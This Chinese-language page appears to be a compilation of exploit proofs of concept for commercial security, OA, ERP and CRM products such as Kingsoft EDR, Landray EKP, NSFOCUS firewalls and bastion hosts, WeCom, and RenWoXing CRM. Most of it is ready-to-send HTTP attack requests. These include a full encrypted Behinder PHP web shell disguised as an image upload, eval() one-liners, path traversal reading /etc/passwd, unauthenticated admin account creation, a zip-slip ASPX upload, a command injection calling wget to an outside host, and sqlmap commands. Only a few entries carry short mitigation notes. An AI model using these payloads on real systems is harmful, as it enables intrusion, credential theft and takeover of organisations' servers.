金山EDR RCE漏洞
开启日志 /Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 131
Origin: http://*.*.*.*
Connection: close
Referer: http://*.*.*.*/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log=on;","type":"0"}}
设置日志php文件
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: *.*.*.*
Content-Length: 195
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://*.*.*.*
Referer: http://*.*.*.*/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SKYLARa0aedxe9e785feabxae789c6e03d=tf2xbucirlmkuqsxpg4bqaq0snb7
Connection: close
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log_file=0x2e2e2f2e2e2f436f6e736f6c652f636865636b5f6c6f67696e322e706870;","type":"0"}}
写入php代码
POST /inter/ajax.php?cmd=settings_distribute_cmd HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101
Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 222
Origin: http://*.*.*.*
Connection: close
Referer: http://*.*.*.*/index.php
{"settings_distribute_cmd":{"userSession":"{BD435CCE-3F91-E1AA-3844-76A49EE862EB}","mode_id":"3AF264D9-AE5A-86F0-6882-DD7F56827017","settings":"3AF264D9-AE5A-86F0-6882-DD7F56827017_0","SC_list":{"a":"<?php phpinfo();?>"}}}
最后get请求rce:
http://*.*.*.*/check_login2.php
金山终端安全系统V9任意文件上传漏洞
POST /inter/software_relation.php HTTP/1.1
Host: 192.168.249.137:6868
Content-Length: 1557
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://192.168.249.137:6868
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxRP5VjBKdqBrCixM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolFileName" ../../datav.php ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="toolDescri" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="id" ------WebKitFormBoundaryxRP5VjBKdqBrCixM
Content-Disposition: form-data; name="version" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="sofe_typeof" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="fileSize" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="param" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolName" ------WebKitFormBoundaryxRP5VjBKdqBrCixM Content-Disposition: form-data; name="toolImage"; filename="3.php" Content-Type: image/png <?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> ------WebKitFormBoundaryxRP5VjBKdqBrCixM蓝凌EKP远程代码执行漏洞
受影响版本:
蓝凌EKP V16 (最新版)受影响存在远程代码执行漏洞;V15暂无环境验证,可能受影响。
修复方案:
使用网络ACL限制该OA的访问来源,加强监测,重点拦截GET请求中带有../等目录穿越特征的URL。
通过文件上传-->解压-->获取webshell,前台漏洞
漏洞路径:
/api///sys/ui/sys_ui_extend/sysUiExtend.do
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}蓝凌OA前台代码执行
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}绿盟 NF 下一代防火墙 任意文件上传漏洞
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:
cmd=phpinfo();绿盟 sas 安全审计系统任意文件读取
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close绿盟 SAS堡垒机 Exec 远程命令执行漏洞
GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close绿盟 SAS堡垒机 GetFile 任意文件读取漏洞
通过漏洞包含 www/local_user.php 实现任意⽤户登录
/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
Cookie: LANG=zh;
USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99","Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
<?xml
version="1.0"?><methodCall><methodName>web.user_add</methodName><params
><param><value><array><data><value><string>admin</string></value><value
><string>5</string></value><value><string>XX.XX.XX.XX</string></value><
/data></array></value></param><param><value><struct><member><name>uname
</name><value><string>deptadmin</string></value></member><member><name>
name</name><value><string>deptadmin</string></value></member><member><n
ame>pwd</name><value><string>Deptadmin@123</string></value></member><me
mber><name>authmode</name><value><string>1</string></value></member><me
mber><name>deptid</name><value><string></string></value></member><membe
r><name>email</name><value><string></string></value></member><member><n
ame>mobile</name><value><string></string></value></member><member><name
>comment</name><value><string></string></value></member><member><name>r
oleid</name><value><string>101</string></value></member></struct></valu
e></param></params></methodCall>明源云 ERP ApiUpdate.ashx 文件上传漏洞
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: target.com
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856
{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}企业微信0dayAgentinfo接口Secret信息泄露
app="Tencent-企业微信"
1.企业微信后台 重置secret
2.waf增加规则禁止访问漏洞点/cgi-bin/gateway/agentinfo
企业微信api 可以利用这个secret获取企业微信的token 利用管理员的token直接操作企业的api 做企业微信管理员的操作。
企业微信零日漏洞攻击事件,企业微信XXX.com/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取,文件获取、使用企业微信轻应用对内力量发送钓鱼文件和链接等风险临时缓释措施为将/cgi-bin.gateway/agentinfo在WAF上进行阻断,具体可联系企业微信团队进行应急,请各单位加强防范
受影响版本:2.5.x、2.6.930000、以下;
不受影响:2.7.x、2.8.x、2.9.x;
启明天钥安全网关前台sql注入
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: ****
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
checkname=123&tagid=123
sqlmap -u "https://xxx.xxx.xxx.xxx:port/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" -v3 --skip-waf --random-agent启明星辰-4A 统一安全管控平台 getMater 信息泄漏
成功条件:相应包状态码 200 相应包内容包含关键词:"\"state\":true"
GET /accountApi/getMaster.do HTTP/1.1
Host: [你的主机名或IP地址]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36
poc:
relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /accountApi/getMaster.do
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.881.36 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("\"state\":true"))
修复建议:
限制文件访问
契约锁电子签章系统 RCE
POST /callback/%2E%2E;/code/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type:multipart/form-data;
boundary=----GokVTLZMRxcJWKfeCvEsYHlszxE
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="type";
TIMETASK
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="file"; filename="qys.jpg"
马儿
----GokVTLZMRxcJWKfeCvEsYHlszxE任我行 CRM SmsDataList SQL注入漏洞
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*任我行CRM系统SQL注入漏洞
详情可参考原文 有复现截图
原文链接:https://mp.weixin.qq.com/s/01uVhwihuwIvpAIrJT4SyQ
任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Keywords=&StartSendDate=2023-07-17&EndSendDate=2023-08-10&SenderTypeId=0000000000*
SenderTypeId参数存在注入,可在SenderTypeId参数值0000000000后自行闭合注入,也可将数据包直接放入sqlmap进行验证
评论 (0)